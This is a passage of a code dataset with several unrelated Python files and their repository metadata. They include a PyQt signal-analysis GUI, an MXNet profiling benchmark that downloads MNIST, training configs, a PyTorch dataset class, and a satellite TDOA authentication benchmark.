self.clearSpecPushButton.clicked.connect(self.speclegTableWidgetClear)\n\n self.drawOscCheckBox.setChecked(False)\n\n self.initMenu()\n self.initNewMark()\n self.clearActiveChan()\n\n self.initUpdReaderOnWork()\n\n self.setOnWork(False)\n\n self.drawOscCheckBox.toggled.connect(self.drawOscCheckBoxToggl)\n\n # -------\n\n self.specWid.list_mark_sig.connect(self.measWid.updateMarks) # cnt\n self.specWid.mark_all_sig.connect(self.measWid.updMarkVals) # vals\n\n\n self.measWid.mark_width_sig.connect(self.specWid.setMarkerWidth)\n self.measWid.error_sig.connect(self.showError)\n\n self.hide()\n\n self.startWid = StartFrom(self)\n self.startWid.HIDE_SIG.connect(self.hideSlot)\n self.startWid.SHOW_SIG.connect(self.showSlot)\n\n self.startWid.START_RD_SIG.connect(self.actionRun)\n self.startWid.START_UPD_SIG.connect(self.actionUpd)\n self.startWid.STOP_SIG.connect(self.actionStop_)\n\n self.startWid.EXIT_SIG.connect(self.exitSlot)\n\n self.startWid.show()\n\n self.cntPushButton.clicked.connect(self.updReaderOnWork_cnt)\n self.specCntPushButton.clicked.connect(self.specCntPushButtonClicked)\n\n self.readConf()\n\n self.genPow2()\n\n\n self.opt_checkBox.stateChanged.connect(self.specWid.setOpt)\n\n self.pow2ComboBox.currentIndexChanged.connect(self.pow2Changed)\n\n #self.measTool.setEnabled(False)\n\n def genPow2(self):\n for i in range(10, 21):\n val = 2 ** i\n self.pow2ComboBox.addItem(str(val))\n\n def pow2Changed(self):\n val = self.pow2ComboBox.currentText()\n self.RD_cntSpinBox.setValue(int(val))\n\n def showSlot(self):\n self.showMaximized()\n\n def hideSlot(self):\n self.hide()\n\n def initUI(self):\n self.setUiDefault()\n self.fixUi()\n self.initSelectUi()\n self.initLayout()\n self.initSub()\n self.initSignals()\n self.generateLegendInit()\n\n def showInfo(self):\n from InfoWid import InfoWid\n self.info = InfoWid()\n self.info.show()\n\n\n\n def initSignals(self):\n self.clearOscPushButton.clicked.connect(self.oscWid.clear)\n self.clearSpecPushButton.clicked.connect(self.specWid.clear)\n self.info0PushButton.clicked.connect(self.showInfo)\n self.info1PushButton.clicked.connect(self.showInfo)\n\n\n\n def startSlot(self):\n self.setOnWork(True)\n\n\n\n\n\n def stopSlot(self):\n self.setOnWork(False)\n self.timer.stop()\n\n\n\n\n def setOnWork(self, state):\n self.onWork = state\n self.btnRun.setEnabled(not state)\n self.btnUpd.setEnabled(not state)\n self.btnStop.setEnabled(state)\n\n def clearLog(self):\n self.logTextBrowser.setText('')\n\n def log(self, newText):\n\n return\n\n txt = self.logTextBrowser.toPlainText()\n if txt == '':\n self.logTextBrowser.setText(newText)\n else:\n self.logTextBrowser.setText(txt + '\\n' + newText)\n\n def midChanged(self):\n self.handler.setMidCnt(int(self.midSpinBox.value()))\n\n def initSub(self):\n\n self.midSpinBox.valueChanged.connect(self.midChanged)\n\n self.rdr = DataReader()\n self.handler = DataHandler()\n self.timer = QTimer()\n\n self.rdr.data_signal.connect(self.handler.dataInSlot)\n self.handler.fft_signal.connect(self.specWid.dataIn)\n self.handler.osc_signal.connect(self.oscWid.dataIn)\n\n self.rdr.error_signal.connect(self.showError)\n\n self.specWid.data_first_sig.connect(self.setChanDef)\n\n self.exit_sig.connect(self.rdr.exitSlot)\n self.exit_sig.connect(self.handler.exitSlot)\n\n self.timer.timeout.connect(self.rdr.timerSlot)\n\n self.rdr.log_signal.connect(self.log)\n self.handler.log_signal.connect(self.log)\n\n\n self.handler.data_in_sig.connect(self.rdr.dataHandledSlot)\n\n self.start_sig.connect(self.startSlot)\n self.stop_signal.connect(self.stopSlot)\n\n\n\n # стоп сигнал от окна к ридеру\n self.stop_signal.connect(self.rdr.stopSlot)\n # стоп сигнал от ридера к хендлеру\n self.rdr.stop_signal.connect(self.handler.stopSlot)\n\n # стоп от хэндлера к окну\n self.handler.stop_signal.connect(self.stopSlot)\n\n self.clear_mid_sig.connect(self.handler.clearMidSlot)\n\n self.clearSpecPushButton.clicked.connect(self.clearAllMark)\n\n\n\n self.rdrTh = QThread()\n self.handlerTh = QThread()\n\n # запуск от окна к ридеру\n self.start_sig.connect(self.rdr.setStartFlg)\n # запуск от ридера к хендлеру\n self.rdr.start_signal.connect(self.handler.setStartFlg)\n\n\n\n self.rdr.moveToThread(self.rdrTh)\n self.handler.moveToThread(self.handlerTh)\n\n\n # запуск потоков - запуск ридера/хендлера\n self.handlerTh.started.connect(self.handler.run)\n self.rdrTh.started.connect(self.rdr.run)\n self.handlerTh.start()\n self.rdrTh.start()\n\n\n\n\n\n\n # --- timer\n\n\n\n\n def initLayout(self):\n self.setCentralWidget(self.tabWidget)\n\n\n self._lt0 = QVBoxLayout()\n self._lt0.addWidget(self.specWid)\n self._lt0.addWidget(self.measWid)\n\n self.lt0 = QHBoxLayout()\n self.lt0.addLayout(self._lt0)\n\n self.lt0.addWidget(self.controlSpecGroupBox)\n self.tabFFT.setLayout(self.lt0)\n\n self.lt1 = QHBoxLayout()\n self.lt1.addWidget(self.oscWid)\n self.lt1.addWidget(self.controlOscGroupBox)\n self.tabOsc.setLayout(self.lt1)\n\n\n\n def showError(self, text0):\n msg = QMessageBox()\n msg.setIcon(QMessageBox.Critical)\n msg.setText(text0)\n msg.setWindowTitle(\"Ошибка\")\n msg.exec_()\n\n def fixUi(self):\n\n pass\n\n\n\n\n def setUiDefault(self):\n self.drawOscCheckBox.setChecked(True)\n\n self.actionStart.setEnabled(True)\n self.actionStop.setEnabled(False)\n\n self.tabWidget.setCurrentIndex(0)\n\n def initSelectUi(self):\n self.actionStart.triggered.connect(self.startClicked)\n self.actionStop.triggered.connect(self.stopClicked)\n\n\n\n def RD_changed(self):\n if 0:\n self.rdTabWidget.setCurrentIndex(0)\n self.meanCheckBox.setEnabled(False)\n self.specClearMidPushButton.setEnabled(False)\n elif self.READ_stepRadioButton.isChecked():\n self.rdTabWidget.setCurrentIndex(1)\n self.meanCheckBox.setEnabled(True)\n self.specClearMidPushButton.setEnabled(True)\n elif self.RD_changeRadioButton.isChecked():\n self.rdTabWidget.setCurrentIndex(2)\n self.meanCheckBox.setEnabled(True)\n self.specClearMidPushButton.setEnabled(True)\n elif self.RD_timerRadioButton.isChecked():\n self.rdTabWidget.setCurrentIndex(3)\n self.meanCheckBox.setEnabled(True)\n self.specClearMidPushButton.setEnabled(True)\n\n\n def FOR_changed(self):\n if self.FOR_binRadioButton.isChecked():\n self.formTabWidget.setCurrentIndex(0)\n elif self.FOR_textRadioButton.isChecked():\n self.formTabWidget.setCurrentIndex(1)\n\n def SRC_changed(self):\n if self.SRC_onefileRadioButton.isChecked():\n self.SRC_tabWidget.setCurrentIndex(0)\n\n elif self.SRC_onefilechanRadioButton.isChecked():\n self.SRC_tabWidget.setCurrentIndex(1)\n\n\n elif self.SRC_filesRadioButton.isChecked():\n self.SRC_tabWidget.setCurrentIndex(2)\n\n elif self.SRC_sharedRadioButton.isChecked():\n self.SRC_tabWidget.setCurrentIndex(3)\n\n\n\n\n # ----------\n\n def setChanDef(self):\n self.tableSpecClick(0,0)\n\n\n def startClicked(self):\n self.parseParams()\n self.specWid.clearStart()\n self.oscWid.clearStart()\n self.start_sig.emit()\n\n\n\n\n\n\n def stopClicked(self):\n self.stop_signal.emit()\n\n def readParams(self):\n pass\n\n def saveClicked(self):\n\n f = open('cnf.cfg' ,'w')\n\n cnt = self.RD_cntSpinBox.text()\n f.write(cnt + '\\n')\n\n if self.SRC_onefileRadioButton.isChecked():\n f.write('0\\n')\n #elif self.SRC_filesRadioButton.isChecked():\n\n\n f.close()\n\n\n def speclegTableWidgetClear(self):\n\n if self.onWork:\n return\n\n table = self.speclegTableWidget\n\n while table.rowCount():\n table.removeRow(0)\n\n\n\n\n def SRC_chanNcomboBoxChange(self):\n table = self.SRC_chanTableWidget\n cnt = int(self.SRC_chanNcomboBox.currentText())\n table.setRowCount(cnt)\n\n\n\n for i in range(cnt):\n item = QTableWidgetItem()\n item.setText(str(i))\n item.setFlags(item.flags() & ~ PyQt5.QtCore.Qt.ItemIsEditable)\n table.setItem(i, 0, item)\n\n\n table.setItem(i, 1, QTableWidgetItem(''))\n\n item = QTableWidgetItem()\n item.setIcon(QIcon('icon/file.png'))\n item.setFlags(item.flags() & ~ PyQt5.QtCore.Qt.ItemIsEditable)\n table.setItem(i, 2, item)\n\n # ----------\n\n\n def parseParams(self):\n\n # --- как идут каналы\n\n if self.startWid.SRC_onefileRadioButton.isChecked():\n self.specWid.setChanN(1)\n self.oscWid.setChanN(1)\n self.measWid.setChan(1)\n self.generateLegend(1)\n chanN = 1\n files = [self.startWid.SRC_onefileSelectLineEdit.text()]\n elif self.startWid.SRC_onefilechanRadioButton.isChecked():\n pass\n elif self.startWid.SRC_filesRadioButton.isChecked():\n table = self.startWid.SRC_chanTableWidget\n chanN = int(self.startWid.SRC_chanNcomboBox.currentText())\n files = []\n for i in range(chanN):\n val = table.item(i, 1).text()\n files.append(val)\n\n self.specWid.setChanN(chanN)\n self.oscWid.setChanN(chanN)\n self.measWid.setChan(chanN)\n self.generateLegend(chanN)\n\n self._chanN = chanN\n self.measWid.setChan(chanN)\n self.rdr.setChanN(chanN)\n self.rdr.setFiles(files)\n\n # ----- комплексные ли\n\n isCompl = self.startWid.FOR_bincomplexCheckBox.isChecked()\n\n self.rdr.setIsCompl(isCompl)\n\n\n # ---- формат данных\n params = {}\n params['end'] = self.startWid.FOR_binendianComboBox.currentText()\n params['sign'] = self.startWid.FOR_binsignComboBox.currentText()\n params['ln'] = int(self.startWid.FOR_binsizeComboBox.currentText())\n\n self.rdr.setDataFromat(params)\n\n # --- режим чтения\n\n\n if self.mode == 'step':\n self.tim = 500\n self.rdr.setPauseStep(self.tim)\n\n self.rdr.setMode(self.mode)\n\n maxPnt = int(self.startWid.RD_cntSpinBox.text())\n self.rdr.setMaxPnt(maxPnt)\n self.handler.setFftEn(True)\n self.handler.setOscEn(self.drawOscCheckBox.isChecked())\n\n self.handlerUpdateParams()\n\n\n\n def setThePeak(self):\n val = float(self.peak_lineEdit.text())\n\n sz = self.peak_ComboBox.currentText()\n\n if sz == 'kHz':\n val = val * 1000\n elif sz == 'mHz':\n val = val * 1000000\n\n\n\n def initUpdReaderOnWork(self):\n self.complSpecCheckBox.toggled.connect(self.updReaderOnWork_isCompl)\n self.specWinComboBox.currentIndexChanged.connect(self.updReaderOnWork_win)\n\n # --\n\n def meanCheckBoxChanged(self):\n if self.meanCheckBox.isChecked():\n self.specClearMidPushButton.setEnabled(True)\n else:\n self.specClearMidPushButton.setEnabled(False)\n\n def updReaderOnWork_mid(self):\n self.handlerUpdateParams()\n self.clear_mid_sig.emit()\n\n def updReaderOnWork_cnt(self):\n maxPnt = int(self.RD_cntSpinBox.text())\n self.rdr.setMaxPnt(maxPnt)\n self.clear_mid_sig.emit()\n\n def updReaderOnWork_win(self):\n self.handlerUpdateParams()\n self.clear_mid_sig.emit()\n\n def updReaderOnWork_isCompl(self):\n self.handlerUpdateParams()\n self.clear_mid_sig.emit()\n\n\n def handlerUpdateParams(self):\n\n fs = int(self.startWid.fsLineEdit.text())\n\n if self.startWid.fsComboBox.currentText() == 'kHz':\n fs = fs * 1000\n elif self.startWid.fsComboBox.currentText() == 'MHz':\n fs = fs * 1000000\n\n\n\n ref = (2 ** int(self.startWid.FOR_binsizeComboBox.currentText())) / 2\n\n\n\n # yes\n win = self.specWinComboBox.currentText()\n isComplFFT = self.complSpecCheckBox.isChecked()\n chanN = self._chanN # cnt\n\n\n self.handler.setParams(chanN, fs, ref, isComplFFT, False)\n self.handler.setWindow(win)\n\n\n\n\n def sleep(self, val):\n from PyQt5.QtCore import QThread\n val = val * 100\n val = int(val)\n QThread.msleep(val)\n\n\n def exitSlot(self):\n t = 0.2\n self.stop_signal.emit()\n self.sleep(t)\n self.exit_sig.emit()\n self.sleep(t)\n self.rdrTh.quit()\n self.handlerTh.quit()\n self.rdrTh.wait()\n self.handlerTh.wait()\n self.startWid.close()\n\n self.saveConf()\n\n\n def closeEvent(self, event):\n event.ignore()\n self.stopClicked()\n self.hide()\n self.startWid.show()\n\n\n\n\n\n\n","repo_name":"lolizz00/RF_TOOL","sub_path":"MW.py","file_name":"MW.py","file_ext":"py","file_size_in_byte":25937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"720651975","text":"import mxnet as mx\nimport argparse\nimport os, sys\nimport time\nimport numpy as np\nfrom mxnet import profiler\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Set network parameters for benchmark test.')\n parser.add_argument('--profile_filename', type=str, default='profile_executor_5iter.json')\n parser.add_argument('--iter_num', type=int, default=5)\n parser.add_argument('--fc1', type=int, default=128)\n parser.add_argument('--fc2', type=int, default=128)\n parser.add_argument('--fc3', type=int, default=128)\n parser.add_argument('--fc4', type=int, default=128)\n return parser.parse_args()\n\n\ndef _download(data_dir):\n if not os.path.isdir(data_dir):\n os.system(\"mkdir \" + data_dir)\n os.chdir(data_dir)\n if (not os.path.exists('train-images-idx3-ubyte')) or \\\n (not os.path.exists('train-labels-idx1-ubyte')) or \\\n (not os.path.exists('t10k-images-idx3-ubyte')) or \\\n (not os.path.exists('t10k-labels-idx1-ubyte')):\n os.system(\"wget http://webdocs.cs.ualberta.ca/~bx3/data/mnist.zip\")\n os.system(\"unzip -u mnist.zip; rm mnist.zip\")\n os.chdir(\"..\")\n\n\ndef get_data(data_shape):\n data_dir = \"mnist/\"\n batch_size = 128\n if '://' not in data_dir:\n _download(data_dir)\n\n train = mx.io.MNISTIter(\n image = data_dir + \"train-images-idx3-ubyte\",\n label = data_dir + \"train-labels-idx1-ubyte\",\n input_shape = data_shape,\n batch_size = batch_size,\n shuffle = True,\n )\n\n val = mx.io.MNISTIter(\n image = data_dir + \"t10k-images-idx3-ubyte\",\n label = data_dir + \"t10k-labels-idx1-ubyte\",\n input_shape = data_shape,\n batch_size = batch_size,\n )\n\n return (train, val)\n\ndef get_symbol():\n data = mx.symbol.Variable('data')\n fc1 = mx.symbol.FullyConnected(data=data, name='fc1', num_hidden=args.fc1)\n act1 = mx.symbol.Activation(data=fc1, name='relu1', act_type='relu')\n fc2 = mx.symbol.FullyConnected(data=act1 , name='fc2', num_hidden=args.fc2)\n act2 = mx.symbol.Activation(data=fc2, name='relu2', act_type='relu')\n fc3 = mx.symbol.FullyConnected(data=act2 , name='fc3', num_hidden=args.fc3)\n act3 = mx.symbol.Activation(data=fc3, name='relu3', act_type='relu')\n fc4 = mx.symbol.FullyConnected(data=act3 , name='fc4', num_hidden=args.fc4)\n act4 = mx.symbol.Activation(data=fc4, name='relu4', act_type='relu')\n fc5 = mx.symbol.FullyConnected(data=act4 , name='fc5', num_hidden=10)\n net = mx.symbol.SoftmaxOutput(data=fc5 , name='softmax')\n return net, [('data', (128, 1, 28, 28))], [('softmax_label', (128, ))]\n\ndef get_module(ctx, sym, provide_data, provide_label, batch_size=None, is_train=True, use_memonger=False):\n if use_memonger:\n sym = search_plan(sym, data=data_shapes)\n mod = mx.mod.Module(symbol=sym,\n data_names=[name for name, _ in provide_data],\n label_names=[name for name, _ in provide_label],\n context=ctx)\n if batch_size is not None:\n provide_data = [(name, (batch_size,) + shape[1:]) for name, shape in provide_data]\n provide_label = [(name, (batch_size,) + shape[1:]) for name, shape in provide_label]\n if is_train:\n mod.bind(data_shapes=provide_data, label_shapes=provide_label, for_training=True, inputs_need_grad=False)\n else:\n mod.bind(data_shapes=provide_data, label_shapes=provide_label, for_training=False, inputs_need_grad=False)\n\n mod.init_params(initializer=mx.init.Xavier(magnitude=2.))\n mod.init_optimizer(optimizer='ccsgd',\n optimizer_params={\n 'learning_rate': 0.0001,\n 'momentum': 0.0,\n 'wd': 0.0\n })\n return mod\n\n\ndef benchmark(mod, dry_run=10, iterations=10):\n if len(mod._context) == 1:\n ctx = mod._context[0]\n else:\n ctx = mx.cpu()\n data = [mx.random.uniform(-1.0, 1.0, shape=shape, ctx=ctx) for _, shape in mod.data_shapes]\n label = [mx.nd.array(np.random.randint(1, 100, size=shape), ctx=ctx) for _, shape in mod.label_shapes]\n batch = mx.io.DataBatch(data, label)\n\n # dry run\n for i in range(dry_run):\n mod.forward(batch, is_train=True)\n mod.backward()\n for output in mod.get_outputs(merge_multi_context=False)[0]:\n output.wait_to_read()\n mod.update()\n\n t0 = time.clock()\n\n profiler.profiler_set_state('run')\n # real run\n for i in range(iterations):\n mod.forward(batch, is_train=True)\n mod.backward()\n mod.update()\n for output in mod.get_outputs(merge_multi_context=False)[0]:\n output.wait_to_read()\n profiler.profiler_set_state('stop')\n\n t1 = time.clock()\n return (t1 - t0)*1000.0 / iterations\n\n\ndef executor(num_iteration):\n sym, provide_data, provide_label = get_symbol()\n ctx = [mx.cpu(0)]\n mod = get_module(ctx, sym, provide_data, provide_label, batch_size=128)\n return benchmark(mod, iterations=args.iter_num)\n\n\nargs = parse_args()\n\nif __name__ == '__main__':\n mx.profiler.profiler_set_config(mode='symbolic', filename=args.profile_filename)\n print('profile file save to {0}'.format(args.profile_filename))\n print('executor num_iteration: {0}'.format(args.iter_num))\n executor_time = executor(args.iter_num)\n print(\"executor {0} ms / iteration\".format(executor_time))\n","repo_name":"hpi-xnor/BMXNet","sub_path":"example/profiler/profiler_executor.py","file_name":"profiler_executor.py","file_ext":"py","file_size_in_byte":5490,"program_lang":"python","lang":"en","doc_type":"code","stars":347,"dataset":"github-code","pt":"37"}
+{"seq_id":"27251099681","text":"from argparse import Namespace\nimport os\n\n\ndef get_config(dataset):\n config = Namespace()\n config.dataset = dataset\n config.embedding_size = 512\n config.sample_rate = 1\n config.fp16 = False\n config.momentum = 0.9\n config.weight_decay = 5e-4\n config.batch_size = 128\n config.mixup_batch_size = 10\n config.test_batch_size = 256\n config.lr = 0.4 # 0.4\n config.dropout = 0.5\n config.output = f\"ms1mv3_arcface_r50_lr{config.lr}_b{config.batch_size}_d{config.dropout}_mixup\"\n config.num_workers = 8\n\n # Train images preprocessed by MTCNN\n if config.dataset == 'APD':\n config.rec = \"APD1/train\"\n config.output = \"ckpt/\" + config.output\n config.num_classes = len(next(os.walk(config.rec))[1]) # 679\n config.num_image = 12899\n config.num_epoch = 40\n config.warmup_epoch = 1\n config.val_split = 0.2\n\n def lr_step_func(epoch):\n return ((epoch + 1) / (4 + 1)) ** 2 if epoch < config.warmup_epoch else 0.1 ** len(\n [m for m in [20, 30, 38] if m - 1 <= epoch])\n config.lr_func = lr_step_func\n\n # Train images preprocessed by pretrained RetinaFace\n elif config.dataset == 'APD2':\n config.rec = \"APD2/train\"\n config.mixupdir = '/home/shin/Documents/FaceMorphing/avgface'\n config.output = \"ckpt2/\" + config.output\n config.num_classes = len(next(os.walk(config.rec))[1]) # 676\n config.num_image = 12905\n config.num_epoch = 35 # 35\n config.warmup_epoch = 1\n config.val_split = 0.2\n\n def lr_step_func(epoch):\n return ((epoch + 1) / (4 + 1)) ** 2 if epoch < config.warmup_epoch else 0.1 ** len(\n [m for m in [20, 30, 33] if m - 1 <= epoch]) # [25, 30, 33]\n config.lr_func = lr_step_func\n\n # Train images preprocessed by our RetinaFace\n elif config.dataset == \"APD3\":\n config.rec = \"APD3/train\"\n config.output = \"ckpt3/\" + config.output\n config.num_classes = len(next(os.walk(config.rec))[1]) # 678\n config.num_image = 13163\n config.num_epoch = 50\n config.warmup_epoch = 1\n config.val_split = 0.2\n\n def lr_step_func(epoch):\n return ((epoch + 1) / (4 + 1)) ** 2 if epoch < config.warmup_epoch else 0.1 ** len(\n [m for m in [35, 45, 48] if m - 1 <= epoch])\n config.lr_func = lr_step_func\n\n else:\n raise NotImplementedError(f'Unsupported dataset: {config.dataset}')\n\n return config\n","repo_name":"shinying/ammai","sub_path":"hw1/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"73595361706","text":"from torch.utils.data import Dataset\nimport torch \n\nclass CustomDataset(Dataset):\n def __init__(self, images, captions, image_paths, raw_captions): #movement): \n\n self.images = images\n self.captions = captions\n self.caption_lengths = torch.LongTensor([len(i) for i in self.captions])\n self.image_paths = image_paths\n self.raw_captions = raw_captions\n #self.movement = movement\n\n def __getitem__(self, index):\n\n image = self.images[index]\n caption = self.captions[index]\n path = self.image_paths[index]\n raw_caption = self.raw_captions[index]\n #movement = self.movement[index]\n \n #t_image = self.transforms(image)\n return image, caption, path, raw_caption#, movement\n\n def __len__(self): # return count of sample we have\n\n return len(self.images)","repo_name":"BluOyster29/image_captioning_pytorch","sub_path":"scripts/image_dataset.py","file_name":"image_dataset.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"}
+{"seq_id":"16464858672","text":"import library.check\nimport library.picker\nimport library.process\nimport tools.variants\n\nimport logging\nlog = logging.getLogger(__name__)\n\n\ndef run(args):\n checker_filter = args.filter\n pupil_filter = args.name\n\n key_picker = library.picker.KeyPicker(key=library.picker.letters_key)\n for work in classes.variants.get_all_variants():\n work_checker = work.get_checker()\n if work_checker:\n key_picker.add(work._task_id, work_checker)\n\n if args.all:\n for checker in key_picker.all(checker_filter):\n list(checker.Check(pupil_filter))\n return\n\n checker = key_picker.get(flt=checker_filter)\n if checker:\n result = ['ФИО\\tОтметка']\n for pupil_result in checker.Check(pupil_filter):\n if pupil_result:\n result.append(f'{pupil_result._pupil.GetFullName(surnameFirst=True)}\\t{pupil_result._mark}')\n\n library.process.pbcopy('\\n'.join(result), name='names and marks')\n\n\ndef populate_parser(parser):\n parser.add_argument('-f', '--filter', help='Filter test')\n parser.add_argument('-n', '--name', help='Filter pupil')\n parser.add_argument('--all', '--all', help='Parse all forms matching filter', action='store_true')\n parser.set_defaults(func=run)\n","repo_name":"burmisha/latex","sub_path":"tools/checker.py","file_name":"checker.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"}
+{"seq_id":"35926255533","text":"try:\n \n horas_trabajadas = float(input(\"Ingresa el número de horas trabajadas: \"))\n tarifa_por_hora = float(input(\"Ingresa la tarifa por hora: \"))\n\n \n if horas_trabajadas <= 40:\n salario_bruto = horas_trabajadas * tarifa_por_hora\n else:\n horas_normales = 40\n horas_extras = horas_trabajadas - 40\n salario_bruto = (horas_normales * tarifa_por_hora) + (horas_extras * tarifa_por_hora * 1.5)\n\n \n print(\"El salario bruto es:\", salario_bruto)\n\nexcept ValueError:\n print(\"Entrada no válida. Por favor, ingresa valores numéricos.\")\n","repo_name":"Didi-an/tarea1_Diana_Cerna","sub_path":"Capitulo 3/Ejercicio 2.py","file_name":"Ejercicio 2.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"36028876340","text":"from Benchmark_TLE_TDOAs import Benchmark_TLE_TDOAs\nfrom Authentication_Algorithms.Authentication_Algorithm_Interface import Authentication_Algorithm\nfrom TimingErrors.NormalDistributed_DynamicError import NormalDistributed_DynamicError\nfrom Signal_Source.SignalSourceInterface import SignalSource\n\nimport numpy as np\n\n\nclass Benchmark_SingnalSource:\n def __init__(self, repetitions: int, total_TLE_file: str):\n self.tle_file = total_TLE_file\n self.repetitions = repetitions\n self.ben_core = Benchmark_TLE_TDOAs(self.tle_file)\n self.ssList = []\n self.ssUtilization = []\n self.eval_alg_list = []\n self.eval_alg_names = []\n\n def __prepare_utilization(self, special_utilization: [float]):\n special_utilization = np.array(special_utilization)\n if np.sum(special_utilization) <= 1.0:\n # the utilization is given in percent\n special_repetitions = np.array(special_utilization * self.repetitions).astype(int)\n elif np.sum(special_utilization) == self.repetitions:\n # the utilization is given in repetitions\n special_repetitions = np.array(special_utilization).astype(int)\n else:\n # the utilization is given in a relative rate\n special_repetitions = np.array(special_utilization / np.sum(special_utilization) * self.repetitions).astype(int)\n return special_repetitions\n\n def make_log_time_scale(self, start: float, stop: float, amount: int):\n return np.logspace(start, stop, num=amount, endpoint=True, base=10)\n\n def add_SignalSource(self, sSource: SignalSource, utilization: float):\n self.ssList.append(sSource)\n self.ssUtilization.append(utilization)\n\n def set_Algorithms(self, eval_algs: [Authentication_Algorithm], eval_algs_names: [str]):\n self.eval_alg_list = eval_algs\n self.eval_alg_names = eval_algs_names\n\n # This method is used to compare dynamic ranges of measurement amounts, receiver amounts and receiver diameter.\n def measurement_dynamics(self, errors_std: float, measurements_amounts: [int], measurements_time_interval: float,\n receiver_amounts: [int], receiver_dias_min: [float], receiver_dias_max: [float],\n save_folder_path: str):\n # create the error model\n error_model = NormalDistributed_DynamicError(0, errors_std)\n # convert the special_utilizations to special_repetitions\n special_repetitions = self.__prepare_utilization(self.ssUtilization)\n # prepare the data-collection\n true_positive_list = [[] for i in range(len(measurements_amounts))] # true_positive_list[measurements][receivers][diameter][alg] = value\n false_positive_list = [[] for i in range(len(measurements_amounts))]\n false_negative_list = [[] for i in range(len(measurements_amounts))]\n true_negative_list = [[] for i in range(len(measurements_amounts))]\n correct_list = [[] for i in range(len(measurements_amounts))] # correct_list[measurements][receivers][diameter][alg] = value\n dist_total_list = [[] for i in range(len(measurements_amounts))] # dist_total_list[measurements][receivers][diameter][alg] = avg distance in km\n # go through each measurement_amount\n for i_meas in range(len(measurements_amounts)):\n #print(f\"VERBOSE:Ben_sig.md.measurements: {i_meas + 1}/{len(measurements_amounts)}.\")\n for i_rec in range(len(receiver_amounts)):\n #print(f\"VERBOSE:Ben_sig.md.rec_am: {i_rec + 1}/{len(receiver_amounts)}.\")\n temp_tp = [] # temp_true_positive_list[diameter][alg] = value\n temp_fn = []\n temp_fp = []\n temp_tn = []\n temp_co = []\n temp_dist = []\n for i_dia in range(len(receiver_dias_min)):\n print(f\"VERBOSE:Ben_sig.md.measurements - rec_am - rec_dia: {i_meas + 1}/{len(measurements_amounts)} - {i_rec + 1}/{len(receiver_amounts)} - {i_dia + 1}/{len(receiver_dias_min)}.\")\n tp_values = np.zeros(len(self.eval_alg_list))\n fn_values = np.zeros(len(self.eval_alg_list))\n fp_values = np.zeros(len(self.eval_alg_list))\n tn_values = np.zeros(len(self.eval_alg_list))\n co_values = np.zeros(len(self.eval_alg_list))\n dist_values = np.zeros(len(self.eval_alg_list))\n for i_spec in range(len(special_repetitions)):\n curr_repetition = special_repetitions[i_spec]\n curr_ss = self.ssList[i_spec]\n curr_val = curr_ss.is_authentic()\n for i_rep in range(curr_repetition):\n receiver_list = self.ben_core.get_receivers(receiver_amounts[i_rec], receiver_dias_min[i_dia],\n receiver_dias_max[i_dia])\n measurement_times = self.ben_core.get_measurement_times(measurements_amounts[i_meas],\n measurements_time_interval)\n sender_found, sender_index, sender_pos = curr_ss.get_positions_TEME(receiver_list, measurement_times)\n if sender_found:\n sender_valid = self.ben_core.verify_sender_visibility(receiver_list, measurement_times, sender_pos)\n else:\n sender_valid = False\n measurement_times = self.ben_core.get_measurement_times(measurements_amounts[i_meas], measurements_time_interval)\n while not sender_valid:\n sender_found, sender_index, sender_pos = curr_ss.get_positions_TEME(receiver_list, measurement_times)\n if sender_found:\n sender_valid = self.ben_core.verify_sender_visibility(receiver_list, measurement_times, sender_pos)\n else:\n sender_valid = False\n measurement_times = self.ben_core.get_measurement_times( measurements_amounts[i_meas], measurements_time_interval)\n sender_name = curr_ss.get_names()[sender_index]\n # execute the simulation\n tp, fn, fp, tn, corr, dist = self.ben_core.perform_mesaurement(receiver_list,\n self.eval_alg_list, sender_pos,\n measurement_times, curr_val,\n sender_name,\n error_model)\n tp_values = tp_values + tp\n fn_values = fn_values + fn\n fp_values = fp_values + fp\n tn_values = tn_values + tn\n co_values = co_values + corr\n dist_values = dist_values + dist\n temp_tp.append(tp_values)\n temp_fn.append(fn_values)\n temp_fp.append(fp_values)\n temp_tn.append(tn_values)\n temp_co.append(co_values)\n temp_dist.append(dist_values)\n true_positive_list[i_meas].append(temp_tp)\n false_positive_list[i_meas].append(temp_fp)\n false_negative_list[i_meas].append(temp_fn)\n true_negative_list[i_meas].append(temp_tn)\n correct_list[i_meas].append(temp_co)\n dist_total_list[i_meas].append(temp_dist)\n # prepare the results\n correct_list = np.array(correct_list) # correct_list[measurements][receivers][diameter][alg] = value\n correct_list = correct_list / self.repetitions * 100 # for values in [%]\n true_positive_list = np.array(true_positive_list)\n false_positive_list = np.array(false_positive_list)\n false_negative_list = np.array(false_negative_list)\n true_negative_list = np.array(true_negative_list)\n # save results in files\n entries = len(receiver_dias_max)*len(self.eval_alg_list)*len(measurements_amounts)*len(receiver_amounts)\n true_positive_list = true_positive_list.reshape(entries)\n false_positive_list = false_positive_list.reshape(entries)\n false_negative_list = false_negative_list.reshape(entries)\n true_negative_list = true_negative_list.reshape(entries)\n correct_list = correct_list.reshape(entries)\n np.savetxt(save_folder_path+\"/data_tp.csv\", true_positive_list, delimiter=\",\")\n np.savetxt(save_folder_path+\"/data_fp.csv\", false_positive_list, delimiter=\",\")\n np.savetxt(save_folder_path+\"/data_fn.csv\", false_negative_list, delimiter=\",\")\n np.savetxt(save_folder_path+\"/data_tn.csv\", true_negative_list, delimiter=\",\")\n np.savetxt(save_folder_path+\"/data_acc.csv\", correct_list, delimiter=\",\")\n\n\n\n\n","repo_name":"ErJedermann/orbitTDOAsignatures","sub_path":"Benchmark_SignalSources.py","file_name":"Benchmark_SignalSources.py","file_ext":"py","file_size_in_byte":9403,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
